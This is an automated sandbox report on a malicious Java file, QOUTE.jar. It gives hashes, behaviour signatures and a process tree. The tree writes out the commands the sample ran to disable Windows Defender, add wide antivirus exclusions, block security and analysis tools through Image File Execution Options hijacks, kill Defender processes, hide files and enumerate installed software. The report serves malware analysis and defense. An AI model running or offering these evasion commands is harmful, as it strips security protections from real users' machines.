Analysis
-
max time kernel
139s -
max time network
130s -
platform
windows10_x64 -
resource
win10 -
submitted
12-07-2020 08:14
General
-
Target
QOUTE.jar
-
Size
402KB
-
MD5
0a79ac74d72bd78b14f2620336eb8154
-
SHA1
cb35e25fd05a342c3201cc7e7c81aa4f7fca99f7
-
SHA256
b52f595bcd319fb9a253efa0c694fcaea8662b0fd34bb384612c1006cc112bd8
-
SHA512
7b74e2c7568a38045c1d760589193e716767e568809391980df03f197515ced2c535ad0d1612e5d05f56ab1684b4bbae562764606a96106909c00e848ccf784a
Score
10/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Views/modifies file attributes 1 TTPs 8 IoCs
-
Checks for installed software on the system 1 TTPs 38 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 164 IoCs
-
Loads dropped DLL 2 IoCs
-
Kills process with taskkill 16 IoCs
-
Sets file execution options in registry 2 TTPs 32 IoCs
-
Drops file in System32 directory 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of WriteProcessMemory 474 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Drops desktop.ini file(s) 4 IoCs
-
Adds Run entry to start application 2 TTPs 4 IoCs
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\QOUTE.jar1⤵
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
- Suspicious behavior: GetForegroundWindowSpam
- Drops desktop.ini file(s)
- Adds Run entry to start application
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\roBcX\Desktop.ini2⤵
- Views/modifies file attributes
- Drops desktop.ini file(s)
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\roBcX\Desktop.ini2⤵
- Views/modifies file attributes
- Drops desktop.ini file(s)
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s +r C:\Users\Admin\roBcX\xvPwc.class2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\roBcX','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\roBcX\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵
-
